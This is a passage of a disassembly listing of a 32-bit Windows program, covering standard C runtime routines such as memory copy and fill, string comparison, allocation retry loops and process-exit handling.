jnz short loc_407713
loc_407720: ; CODE XREF: sub_4076D5+46�j
cmp edi, ebx
jnz short loc_407734
mov [ecx], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_4076F4
; ---------------------------------------------------------------------------
loc_407734: ; CODE XREF: sub_4076D5+4D�j
xor eax, eax
loc_407736: ; CODE XREF: sub_4076D5+2E�j
pop edi
pop esi
pop ebx
retn
sub_4076D5 endp
; =============== S U B R O U T I N E =======================================
sub_40773A proc near ; CODE XREF: sub_404C69+3B�p
; sub_405934+48�p ...
arg_0 = dword ptr 4
push esi
push edi
xor esi, esi
loc_40773E: ; CODE XREF: sub_40773A+39�j
push [esp+8+arg_0]
call sub_4036E0
mov edi, eax
test edi, edi
pop ecx
jnz short loc_407775
cmp ds:dword_425F70, eax
jbe short loc_407775
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_40776E
or eax, 0FFFFFFFFh
loc_40776E: ; CODE XREF: sub_40773A+2F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_40773E
loc_407775: ; CODE XREF: sub_40773A+12�j
; sub_40773A+1A�j
mov eax, edi
pop edi
pop esi
retn
sub_40773A endp
; =============== S U B R O U T I N E =======================================
sub_40777A proc near ; CODE XREF: sub_402DB6+5�p
; sub_40531A+30�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_40777E: ; CODE XREF: sub_40777A+41�j
push 0
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40D94F
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_4077BD
cmp ds:dword_425F70, eax
jbe short loc_4077BD
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_4077B6
or eax, 0FFFFFFFFh
loc_4077B6: ; CODE XREF: sub_40777A+37�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_40777E
loc_4077BD: ; CODE XREF: sub_40777A+1A�j
; sub_40777A+22�j
mov eax, edi
pop edi
pop esi
retn
sub_40777A endp
; =============== S U B R O U T I N E =======================================
sub_4077C2 proc near ; CODE XREF: sub_402D09+58�p
; sub_402D09+6F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_4077C6: ; CODE XREF: sub_4077C2+44�j
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40DA6D
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_407808
cmp [esp+8+arg_4], eax
jz short loc_407808
cmp ds:dword_425F70, eax
jbe short loc_407808
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_407801
or eax, 0FFFFFFFFh
loc_407801: ; CODE XREF: sub_4077C2+3A�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_4077C6
loc_407808: ; CODE XREF: sub_4077C2+17�j
; sub_4077C2+1D�j ...
mov eax, edi
pop edi
pop esi
retn
sub_4077C2 endp
; =============== S U B R O U T I N E =======================================
sub_40780D proc near ; CODE XREF: sub_408DD8+40�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
xor esi, esi
loc_407811: ; CODE XREF: sub_40780D+49�j
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40DC88
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_407858
cmp [esp+8+arg_8], eax
jz short loc_407858
cmp ds:dword_425F70, eax
jbe short loc_407858
push esi
call ds:dword_41D0FC
lea eax, [esi+3E8h]
cmp eax, ds:dword_425F70
jbe short loc_407851
or eax, 0FFFFFFFFh
loc_407851: ; CODE XREF: sub_40780D+3F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_407811
loc_407858: ; CODE XREF: sub_40780D+1C�j
; sub_40780D+22�j ...
mov eax, edi
pop edi
pop esi
retn
sub_40780D endp
; =============== S U B R O U T I N E =======================================
sub_40785D proc near ; CODE XREF: seg000:0040403F�p
; seg000:00404065�p ...
arg_0 = dword ptr 4
call sub_409C54
push [esp+arg_0]
call sub_409AB4
push ds:off_423930
call sub_405193
push 0FFh
call eax
add esp, 0Ch
retn
sub_40785D endp
; =============== S U B R O U T I N E =======================================
sub_407881 proc near ; CODE XREF: sub_4078A7+4�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_41D0E4
test eax, eax
jz short locret_4078A6
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_41D0EC
test eax, eax
jz short locret_4078A6
push [esp+arg_0]
call eax
locret_4078A6: ; CODE XREF: sub_407881+D�j
; sub_407881+1D�j
retn
sub_407881 endp
; =============== S U B R O U T I N E =======================================
sub_4078A7 proc near ; CODE XREF: sub_4036E0+34�p
; sub_403ED3+1C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_407881
pop ecx
push [esp+arg_0]
call ds:dword_41D050
int 3 ; Trap to Debugger
sub_4078A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4078BC proc near ; CODE XREF: sub_402DE5+C�p
push 8
call sub_4059F7
pop ecx
retn
sub_4078BC endp
; =============== S U B R O U T I N E =======================================
sub_4078C5 proc near ; CODE XREF: sub_402E1B�p
push 8
call sub_40591F
pop ecx
retn
sub_4078C5 endp
; =============== S U B R O U T I N E =======================================
sub_4078CE proc near ; CODE XREF: sub_407A0B+78�p
; sub_407A0B+88�p
arg_0 = dword ptr 4
push esi
mov esi, eax
jmp short loc_4078DE
; ---------------------------------------------------------------------------
loc_4078D3: ; CODE XREF: sub_4078CE+14�j
mov eax, [esi]
test eax, eax
jz short loc_4078DB
call eax
loc_4078DB: ; CODE XREF: sub_4078CE+9�j
add esi, 4
loc_4078DE: ; CODE XREF: sub_4078CE+3�j
cmp esi, [esp+4+arg_0]
jb short loc_4078D3
pop esi
retn
sub_4078CE endp
; =============== S U B R O U T I N E =======================================
sub_4078E6 proc near ; CODE XREF: sub_407979+32�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
jmp short loc_4078FE
; ---------------------------------------------------------------------------
loc_4078EF: ; CODE XREF: sub_4078E6+1C�j
test eax, eax
jnz short loc_407904
mov ecx, [esi]
test ecx, ecx
jz short loc_4078FB
call ecx
loc_4078FB: ; CODE XREF: sub_4078E6+11�j
add esi, 4
loc_4078FE: ; CODE XREF: sub_4078E6+7�j
cmp esi, [esp+4+arg_4]
jb short loc_4078EF
loc_407904: ; CODE XREF: sub_4078E6+B�j
pop esi
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
sub_407906 proc near ; CODE XREF: sub_405A28+12�p
; sub_40CB14+27�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_40792E
loc_407911: ; CODE XREF: sub_407906+2F�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40792E: ; CODE XREF: sub_407906+9�j
mov eax, ds:dword_425F78
cmp eax, esi
jz short loc_407911
mov [ecx], eax
xor eax, eax
pop esi
retn
sub_407906 endp
; =============== S U B R O U T I N E =======================================
sub_40793D proc near ; CODE XREF: sub_405A28+2D�p
; sub_40F524+11F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_407965
loc_407948: ; CODE XREF: sub_40793D+2E�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_407965: ; CODE XREF: sub_40793D+9�j
cmp ds:dword_425F78, esi
jz short loc_407948
mov ecx, ds:dword_425F84
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_40793D endp
; =============== S U B R O U T I N E =======================================
sub_407979 proc near ; CODE XREF: seg000:0040407D�p
arg_0 = dword ptr 4
cmp ds:off_41ED94, 0
jz short loc_40799C
push offset off_41ED94
call sub_40CC52
test eax, eax
pop ecx
jz short loc_40799C
push [esp+arg_0]
call ds:off_41ED94
pop ecx
loc_40799C: ; CODE XREF: sub_407979+7�j
; sub_407979+16�j
call sub_40D59E
push offset dword_41D2D8
push offset dword_41D2BC
call sub_4078E6
test eax, eax
pop ecx
pop ecx
jnz short locret_407A0A
push esi
push edi
push offset sub_40B066
call sub_402E21
mov esi, offset dword_41D288
mov eax, esi
mov edi, offset dword_41D2B8
cmp eax, edi
pop ecx
jnb short loc_4079E2
loc_4079D3: ; CODE XREF: sub_407979+67�j
mov eax, [esi]
test eax, eax
jz short loc_4079DB
call eax
loc_4079DB: ; CODE XREF: sub_407979+5E�j
add esi, 4
cmp esi, edi
jb short loc_4079D3
loc_4079E2: ; CODE XREF: sub_407979+58�j
cmp ds:dword_434DD8, 0
pop edi
pop esi
jz short loc_407A08
push offset dword_434DD8
call sub_40CC52
test eax, eax
pop ecx
jz short loc_407A08
push 0
push 2
push 0
call ds:dword_434DD8
loc_407A08: ; CODE XREF: sub_407979+72�j
; sub_407979+81�j
xor eax, eax
locret_407A0A: ; CODE XREF: sub_407979+3B�j
retn
sub_407979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A0B proc near ; CODE XREF: sub_407AD9+8�p
; sub_407AEA+8�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00407AD3 SIZE 00000006 BYTES
push 0Ch
push offset dword_4214F8
call __SEH_prolog4
push 8
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
xor esi, esi
inc esi
cmp ds:dword_425FB8, esi
jz short loc_407A99
mov ds:dword_425FB4, esi
mov al, byte ptr [ebp+arg_8]
mov ds:byte_425FB0, al
cmp [ebp+arg_4], 0
jnz short loc_407A89
push ds:dword_434DD0
call sub_405193
mov edi, eax
push ds:dword_434DCC
call sub_405193
pop ecx
pop ecx
mov [ebp+var_1C], eax
test edi, edi
jz short loc_407A79
loc_407A63: ; CODE XREF: sub_407A0B+68�j
; sub_407A0B+6C�j
sub [ebp+var_1C], 4
cmp [ebp+var_1C], edi
jb short loc_407A79
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_407A63
call eax
jmp short loc_407A63
; ---------------------------------------------------------------------------
loc_407A79: ; CODE XREF: sub_407A0B+56�j
; sub_407A0B+5F�j
push offset dword_41D2E8
mov eax, offset dword_41D2DC
call sub_4078CE
pop ecx
loc_407A89: ; CODE XREF: sub_407A0B+35�j
push offset dword_41D2F4
mov eax, offset dword_41D2EC
call sub_4078CE
pop ecx
loc_407A99: ; CODE XREF: sub_407A0B+21�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407AC4
cmp [ebp+arg_8], 0
jnz short loc_407AD3
mov ds:dword_425FB8, esi
push 8
call sub_40591F
pop ecx
push [ebp+arg_0]
call sub_4078A7
loc_407AC1: ; DATA XREF: seg001:00421510�o
xor esi, esi
inc esi
sub_407A0B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_407AC4 proc near ; CODE XREF: sub_407A0B+95�p
cmp dword ptr [ebp+10h], 0
jz short locret_407AD2
push 8
call sub_40591F
pop ecx
locret_407AD2: ; CODE XREF: sub_407AC4+4�j
retn
sub_407AC4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_407A0B
loc_407AD3: ; CODE XREF: sub_407A0B+9E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_407A0B
; =============== S U B R O U T I N E =======================================
sub_407AD9 proc near ; CODE XREF: seg000:004040B9�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_407A0B
add esp, 0Ch
retn
sub_407AD9 endp
; =============== S U B R O U T I N E =======================================
sub_407AEA proc near ; CODE XREF: seg000:004040E9�p
; sub_40DD29+D9�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_407A0B
add esp, 0Ch
retn
sub_407AEA endp
; =============== S U B R O U T I N E =======================================
sub_407AFB proc near ; CODE XREF: seg000:loc_4040BE�p
push 1
push 0
push 0
call sub_407A0B
add esp, 0Ch
retn
sub_407AFB endp
; =============== S U B R O U T I N E =======================================
sub_407B0A proc near ; CODE XREF: seg000:loc_4040EE�p
push 1
push 1
push 0
call sub_407A0B
add esp, 0Ch
retn
sub_407B0A endp
; =============== S U B R O U T I N E =======================================
sub_407B19 proc near ; CODE XREF: sub_4054D6+C4�p
push esi
call sub_40518A
mov esi, eax
push esi
call sub_408058
push esi
call sub_40CAFA
push esi
call sub_402E33
push esi
call sub_40DEE3
push esi
call sub_40DED9
push esi
call sub_40DCCF
push esi
call nullsub_2
push esi
call sub_40BEDC
push offset sub_407AEA
call sub_405127
add esp, 24h
mov ds:off_423930, eax
pop esi
retn
sub_407B19 endp
; =============== S U B R O U T I N E =======================================
sub_407B65 proc near ; CODE XREF: sub_402E3D+CE�p
; sub_402F39+18�p ...
and ds:dword_434DC4, 0
retn
sub_407B65 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407B70 proc near ; CODE XREF: sub_40177B+4A�p
; sub_40177B+5E�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_407BE5
xor eax, eax
mov al, [esp+arg_4]
test al, al
jnz short loc_407B9C
cmp edx, 100h
jb short loc_407B9C
cmp ds:dword_433C7C, 0
jz short loc_407B9C
jmp sub_40DF44
; ---------------------------------------------------------------------------
loc_407B9C: ; CODE XREF: sub_407B70+14�j
; sub_407B70+1C�j ...
push edi
mov edi, ecx
cmp edx, 4
jb short loc_407BD5
neg ecx
and ecx, 3
jz short loc_407BB7
sub edx, ecx
loc_407BAD: ; CODE XREF: sub_407B70+45�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_407BAD
loc_407BB7: ; CODE XREF: sub_407B70+39�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_407BD5
rep stosd
test edx, edx
jz short loc_407BDF
loc_407BD5: ; CODE XREF: sub_407B70+32�j
; sub_407B70+5D�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_407BD5
loc_407BDF: ; CODE XREF: sub_407B70+63�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_407BE5: ; CODE XREF: sub_407B70+A�j
mov eax, [esp+arg_0]
retn
sub_407B70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF0 proc near ; CODE XREF: sub_402F72+43�p
; sub_408DD8+35�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407C10
cmp edi, eax
jb loc_407DB4
loc_407C10: ; CODE XREF: sub_407BF0+16�j
cmp ecx, 100h
jb short loc_407C37
cmp ds:dword_433C7C, 0
jz short loc_407C37
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_407C37
pop esi
pop edi
pop ebp
jmp sub_40D86C
; ---------------------------------------------------------------------------
loc_407C37: ; CODE XREF: sub_407BF0+26�j
; sub_407BF0+2F�j ...
test edi, 3
jnz short loc_407C54
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407C54: ; CODE XREF: sub_407BF0+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_407C6C
and eax, 3
add ecx, eax
jmp dword ptr loc_407C74+4[eax*4]
; ---------------------------------------------------------------------------
loc_407C6C: ; CODE XREF: sub_407BF0+6E�j
jmp dword ptr loc_407D74[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407C74: ; CODE XREF: sub_407BF0+58�j
; sub_407BF0+B6�j ...
jmp off_407CF8[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407C88
dd offset loc_407CB4
; ---------------------------------------------------------------------------
fdivr dword ptr [eax+eax*2+0]
loc_407C88: ; DATA XREF: sub_407BF0+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407CB4: ; DATA XREF: sub_407BF0+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407CF8 dd offset loc_407D5B ; DATA XREF: sub_407BF0:loc_407C74�r
dd offset loc_407D48
dd offset loc_407D40
dd offset loc_407D38
dd offset loc_407D30
dd offset loc_407D28
dd offset loc_407D20
dd offset loc_407D18
; ---------------------------------------------------------------------------
loc_407D18: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_407D20: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_407D28: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_407D30: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_407D38: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_407D40: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_407D48: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407D5B: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0:off_407CF8�o
jmp off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407D64 dd offset loc_407D74 ; DATA XREF: sub_407BF0+5C�r
; sub_407BF0+BA�r ...
dd offset loc_407D7C
dd offset loc_407D88
dd offset loc_407D9C
; ---------------------------------------------------------------------------
loc_407D74: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D7C: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D88: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D9C: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407DB4: ; CODE XREF: sub_407BF0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_407DE8
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407DDC: ; CODE XREF: sub_407BF0+1DD�j
; sub_407BF0+238�j ...
neg ecx
jmp off_407EB0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407DE8: ; CODE XREF: sub_407BF0+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407E00
and eax, 3
sub ecx, eax
jmp dword ptr loc_407E00+4[eax*4]
; ---------------------------------------------------------------------------
loc_407E00: ; CODE XREF: sub_407BF0+202�j
; DATA XREF: sub_407BF0+209�r
jmp off_407F00[ecx*4]
; ---------------------------------------------------------------------------
align 4
adc al, 7Eh
inc eax
add [eax], bh
jle short loc_407E4F
add [eax+7Eh], ah
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
loc_407E4F: ; CODE XREF: sub_407BF0+21D�j
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_407DDC
std
rep movsd
cld
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407EB4
dd offset loc_407EBC
dd offset loc_407EC4
dd offset loc_407ECC
dd offset loc_407ED4
dd offset loc_407EDC
dd offset loc_407EE4
off_407EB0 dd offset loc_407EF7 ; DATA XREF: sub_407BF0+1EE�r
; ---------------------------------------------------------------------------
loc_407EB4: ; DATA XREF: sub_407BF0+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_407EBC: ; DATA XREF: sub_407BF0+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_407EC4: ; DATA XREF: sub_407BF0+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_407ECC: ; DATA XREF: sub_407BF0+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_407ED4: ; DATA XREF: sub_407BF0+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_407EDC: ; DATA XREF: sub_407BF0+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_407EE4: ; DATA XREF: sub_407BF0+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407EF7: ; CODE XREF: sub_407BF0+1EE�j
; DATA XREF: sub_407BF0:off_407EB0�o
jmp off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407F00 dd offset loc_407F10 ; DATA XREF: sub_407BF0+1E3�r
; sub_407BF0:loc_407E00�r ...
dd offset loc_407F18
dd offset loc_407F28
dd offset loc_407F3C
; ---------------------------------------------------------------------------
loc_407F10: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F18: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F28: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F3C: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F55 proc near ; CODE XREF: sub_402FED+7�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421518
call __SEH_prolog4
push 0Eh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_407FA6
mov eax, ds:dword_425FC0
mov edx, offset dword_425FBC
loc_407F81: ; CODE XREF: sub_407F55+65�j
mov [ebp+var_1C], eax
test eax, eax
jz short loc_407F99
cmp [eax], ecx
jnz short loc_407FB8
mov ecx, [eax+4]
mov [edx+4], ecx
push eax
call sub_403603
pop ecx
loc_407F99: ; CODE XREF: sub_407F55+31�j
push dword ptr [esi+4]
call sub_403603
pop ecx
and dword ptr [esi+4], 0
loc_407FA6: ; CODE XREF: sub_407F55+20�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407FBC
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_407FB8: ; CODE XREF: sub_407F55+35�j
mov edx, eax
jmp short loc_407F81
sub_407F55 endp
; =============== S U B R O U T I N E =======================================
sub_407FBC proc near ; CODE XREF: sub_407F55+58�p
; DATA XREF: seg001:00421530�o
push 0Eh
call sub_40591F
pop ecx
retn
sub_407FBC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407FD0 proc near ; CODE XREF: sub_403017+C�p
; sub_40B1FC+25�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_40801C
loc_407FE0: ; CODE XREF: sub_407FD0+3C�j
; sub_407FD0+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+1]
jnz short loc_408014
or ah, ah
jz short loc_408010
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+3]
jnz short loc_408014
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_407FE0
mov edi, edi
loc_408010: ; CODE XREF: sub_407FD0+18�j
; sub_407FD0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_408014: ; CODE XREF: sub_407FD0+14�j
; sub_407FD0+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_40801C: ; CODE XREF: sub_407FD0+E�j
test edx, 1
jz short loc_40803C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_408014
add ecx, 1
or al, al
jz short loc_408010
test edx, 2
jz short loc_407FE0
loc_40803C: ; CODE XREF: sub_407FD0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_408014
or al, al
jz short loc_408010
cmp ah, [ecx+1]
jnz short loc_408014
or ah, ah
jz short loc_408010
add ecx, 2
jmp short loc_407FE0
sub_407FD0 endp
; =============== S U B R O U T I N E =======================================
sub_408058 proc near ; CODE XREF: sub_407B19+9�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_425FC4, eax
retn
sub_408058 endp
; =============== S U B R O U T I N E =======================================
sub_408062 proc near ; CODE XREF: sub_40304B+B�p
; sub_4036E0+8C�p ...
arg_0 = dword ptr 4
push ds:dword_425FC4
call sub_405193
test eax, eax
pop ecx
jz short loc_408081
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_408081
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_408081: ; CODE XREF: sub_408062+E�j
; sub_408062+19�j
xor eax, eax
retn
sub_408062 endp
; =============== S U B R O U T I N E =======================================
sub_408084 proc near ; CODE XREF: sub_4067D6+76�p
; sub_4067D6+82�p ...
mov eax, offset off_423950
retn
sub_408084 endp
; =============== S U B R O U T I N E =======================================
sub_40808A proc near ; DATA XREF: seg001:0041D2C8�o
mov eax, ds:dword_434DC0
test eax, eax
push esi
push 14h
pop esi
jnz short loc_40809E
mov eax, 200h
jmp short loc_4080A4
; ---------------------------------------------------------------------------
loc_40809E: ; CODE XREF: sub_40808A+B�j
